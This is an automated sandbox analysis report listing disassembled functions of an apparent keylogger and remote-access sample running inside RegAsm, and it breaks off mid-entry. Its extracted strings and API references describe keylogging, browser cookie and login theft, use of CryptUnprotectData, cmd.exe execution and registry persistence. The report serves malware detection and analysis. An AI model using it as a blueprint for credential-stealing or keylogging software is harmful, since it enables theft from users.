                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                    • String ID: /sort "Visit Time" /stext "$0NG
                    • API String ID: 368326130-3219657780
                    • Opcode ID: 3041f1bf41341a7a35509bb268a87c49b4086886f3ef8ac56f6be550602b56b3
                    • Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
                    • Opcode Fuzzy Hash: 3041f1bf41341a7a35509bb268a87c49b4086886f3ef8ac56f6be550602b56b3
                    • Instruction Fuzzy Hash: E9316271A0011956CB15FBA6D8969EE7375AB90308F40007FF206B71E2EF385D89CA99
                    Function 0041C9E2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                    Download Yara Rule
                    APIs
                    • SystemParametersInfoW.USER32 ref: 0041CAD7
                      • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                      • Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
                      • Part of subcall function 0041376F: RegCloseKey.KERNEL32(?), ref: 004137B1
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateInfoParametersSystemValue
                    • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                    • API String ID: 4127273184-3576401099
                    • Opcode ID: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
                    • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                    • Opcode Fuzzy Hash: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
                    • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                    Function 004162E4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                    Download Yara Rule
                    APIs
                    • _wcslen.LIBCMT ref: 004162F5
                      • Part of subcall function 00413877: RegCreateKeyA.ADVAPI32(80000001,00000000,004660A4), ref: 00413885
                      • Part of subcall function 00413877: RegSetValueExA.KERNEL32(004660A4,000000AF,00000000,00000004,00000001,00000004), ref: 004138A0
                      • Part of subcall function 00413877: RegCloseKey.KERNEL32(004660A4), ref: 004138AB
                      • Part of subcall function 00409DE4: _wcslen.LIBCMT ref: 00409DFD
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: _wcslen$CloseCreateValue
                    • String ID: !D@$okmode$PG
                    • API String ID: 3411444782-3370592832
                    • Opcode ID: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
                    • Instruction ID: dff749dc984b923ba5de2327a6f3f9cc2e67bcaf748228c26ce3aec7d70e92d7
                    • Opcode Fuzzy Hash: 56d367afe2ba597d6a39c7afb1f52fa5ab03872d574dd40714d897b86eaaf0d3
                    • Instruction Fuzzy Hash: 10119371B442011ADB187B72D832ABD22969F94358F80443FF54AAF2E2DEBD4C51525D
                    Function 0040C5EC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040C4C3: PathFileExistsW.SHLWAPI(00000000), ref: 0040C4F6
                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C61D
                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C688
                    Strings
                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C635
                    • User Data\Default\Network\Cookies, xrefs: 0040C603
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                    • API String ID: 1174141254-1980882731
                    • Opcode ID: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                    • Instruction ID: e6b9b9a8142aca5ff9e4641a3ff80a721fb4b0471daa7637ae592fad8ebd6223
                    • Opcode Fuzzy Hash: f3bc938036da248068b0be9c9c2ef6302554ca2f51a2acae7b142117e121394f
                    • Instruction Fuzzy Hash: B421037190011996CB14F7A2DC96CEEB738EE50319F40053FB502B31D2EF789A46C698
                    Function 0040C6BB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040C526: PathFileExistsW.SHLWAPI(00000000), ref: 0040C559
                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6EC
                    • PathFileExistsW.SHLWAPI(00000000), ref: 0040C757
                    Strings
                    • User Data\Profile ?\Network\Cookies, xrefs: 0040C704
                    • User Data\Default\Network\Cookies, xrefs: 0040C6D2
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExistsFilePath
                    • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                    • API String ID: 1174141254-1980882731
                    • Opcode ID: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                    • Instruction ID: 83f6a23093d6b0727a30a1d550f3d6f5bdb2bb72864fa742cd8a9fd6423befd9
                    • Opcode Fuzzy Hash: cddf59ed0f0a35ae698fc10c37901bb26126bcec9028eb75e0275fc853fc9b73
                    • Instruction Fuzzy Hash: AE21D37190011AD6CB05F7A2DC96CEEB778EE50719B50013FF502B31D2EF789A46C698
                    Function 0040B164 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68timeCOMMON
                    Download Yara Rule
                    APIs
                    • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                    • wsprintfW.USER32 ref: 0040B1F3
                      • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: EventLocalTimewsprintf
                    • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                    • API String ID: 1497725170-1359877963
                    • Opcode ID: c8cd868dd362bd9616f6924cb695c27546a7cf7ec47136230a452d94a8988757
                    • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                    • Opcode Fuzzy Hash: c8cd868dd362bd9616f6924cb695c27546a7cf7ec47136230a452d94a8988757
                    • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                    Function 0040AEEE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                      • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                      • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                    • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040AF6E
                    • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040AF7A
                    • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateThread$LocalTime$wsprintf
                    • String ID: Online Keylogger Started
                    • API String ID: 112202259-1258561607
                    • Opcode ID: 958200284c2bea51d202cfda8ca6d09af1b0fae5d8a7627b3d8146febcef491d
                    • Instruction ID: a86b307176fed80e65d2d8085b20e14cf0e56bf63d45b36b749a5edd9f3e52e0
                    • Opcode Fuzzy Hash: 958200284c2bea51d202cfda8ca6d09af1b0fae5d8a7627b3d8146febcef491d
                    • Instruction Fuzzy Hash: 1401C8A070031939E62076365C87D7F7A5DCA81398F40057FF645362C6D97D1C5586FB
                    Function 00406A63 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(crypt32), ref: 00406A82
                    • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: CryptUnprotectData$crypt32
                    • API String ID: 2574300362-2380590389
                    • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                    • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                    • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                    • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                    Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                    Download Yara Rule
                    APIs
                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                    • CloseHandle.KERNEL32(?), ref: 004051CA
                    • SetEvent.KERNEL32(?), ref: 004051D9
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseEventHandleObjectSingleWait
                    • String ID: Connection Timeout
                    • API String ID: 2055531096-499159329
                    • Opcode ID: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                    • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                    • Opcode Fuzzy Hash: 0fd579d592e0ec80786bd468370273e6dda72da4d01b044bfcfe4f18e9b09a20
                    • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                    Function 0040E7C5 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                    Download Yara Rule
                    APIs
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Exception@8Throw
                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                    • API String ID: 2005118841-1866435925
                    • Opcode ID: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                    • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                    • Opcode Fuzzy Hash: 14b47bc0c01e13b5246ea87e39f47a408aa5ce0847750dcdb3cc0488a1de7433
                    • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                    Function 00413814 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                    Download Yara Rule
                    APIs
                    • RegCreateKeyW.ADVAPI32(80000001,00000000,004752D8), ref: 0041381F
                    • RegSetValueExW.ADVAPI32 ref: 0041384D
                    • RegCloseKey.ADVAPI32(004752D8), ref: 00413858
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseCreateValue
                    • String ID: pth_unenc
                    • API String ID: 1818849710-4028850238
                    • Opcode ID: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                    • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                    • Opcode Fuzzy Hash: 0de8c57798d2a052ed48f9ba6d58c7c81afdedd1aa2e5c5a2a8de63742f16a74
                    • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                    Function 0040DFA6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                    Download Yara Rule
                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                      • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                      • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                    • String ID: bad locale name
                    • API String ID: 3628047217-1405518554
                    • Opcode ID: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                    • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                    • Opcode Fuzzy Hash: 86f49e18a429e1939de4d1535c8c5fe7fe9a78163a93b43351c768af92284890
                    • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                    Function 00416C2D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33threadCOMMON
                    Download Yara Rule
                    APIs
                    • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                    • ShowWindow.USER32(00000009), ref: 00416C61
                    • SetForegroundWindow.USER32 ref: 00416C6D
                      • Part of subcall function 0041CD9B: AllocConsole.KERNEL32 ref: 0041CDA4
                      • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                      • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                    • String ID: !D@
                    • API String ID: 3446828153-604454484
                    • Opcode ID: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
                    • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                    • Opcode Fuzzy Hash: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
                    • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                    Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                    Download Yara Rule
                    APIs
                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExecuteShell
                    • String ID: /C $cmd.exe$open
                    • API String ID: 587946157-3896048727
                    • Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                    • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                    • Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                    • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                    Function 0040B8AC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                    Download Yara Rule
                    APIs
                    • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                    • UnhookWindowsHookEx.USER32 ref: 0040B8C7
                    • TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: TerminateThread$HookUnhookWindows
                    • String ID: pth_unenc
                    • API String ID: 3123878439-4028850238
                    • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                    • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
                    • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                    • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
                    Function 0040140A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                    • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressHandleModuleProc
                    • String ID: GetCursorInfo$User32.dll
                    • API String ID: 1646373207-2714051624
                    • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                    • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                    • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                    • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                    Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(User32.dll), ref: 004014B9
                    • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressLibraryLoadProc
                    • String ID: GetLastInputInfo$User32.dll
                    • API String ID: 2574300362-1519888992
                    • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                    • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                    • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                    • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                    Function 0044A004 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: __alldvrm$_strrchr
                    • String ID:
                    • API String ID: 1036877536-0
                    • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                    • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                    • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                    • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                    Function 00442801 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                    • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                    • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                    • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                    Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                    • Cleared browsers logins and cookies., xrefs: 0040C0F5
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                    • API String ID: 3472027048-1236744412
                    • Opcode ID: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
                    • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                    • Opcode Fuzzy Hash: f04c9fcfc5d51e830be94f028420677c48269f78a09cd2570410497d2b162b15
                    • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                    Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0041C551: GetForegroundWindow.USER32 ref: 0041C561
                      • Part of subcall function 0041C551: GetWindowTextLengthW.USER32 ref: 0041C56A
                      • Part of subcall function 0041C551: GetWindowTextW.USER32 ref: 0041C594
                    • Sleep.KERNEL32(000001F4), ref: 0040A573
                    • Sleep.KERNEL32(00000064), ref: 0040A5FD
                    Strings
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$SleepText$ForegroundLength
                    • String ID: [ $ ]
                    • API String ID: 3309952895-93608704
                    • Opcode ID: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
                    • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                    • Opcode Fuzzy Hash: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
                    • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                    Function 00443AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                    • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                    • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                    • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                    Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                    Download Yara Rule
                    APIs
                    • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4D7
                    • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CloseCreateHandleReadSize
                    • String ID:
                    • API String ID: 3919263394-0
                    • Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                    • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                    • Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                    • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                    Function 0041C1DD Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                    Download Yara Rule
                    APIs
                    • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                    • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                    • CloseHandle.KERNEL32(00000000), ref: 0041C233
                    • CloseHandle.KERNEL32(00000000), ref: 0041C23B
                    Memory Dump Source
                    • Source File: 0000000C.00000002.1053711584.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseHandleOpenProcess
                    • String ID:
                    • API String ID: 39102293-0
                    • Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                    • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                    • Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                    • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                    Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                      • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                    • _UnwindNestedFrames.LIBCMT ref: 00439891
                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                    • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                    Memory Dump Source
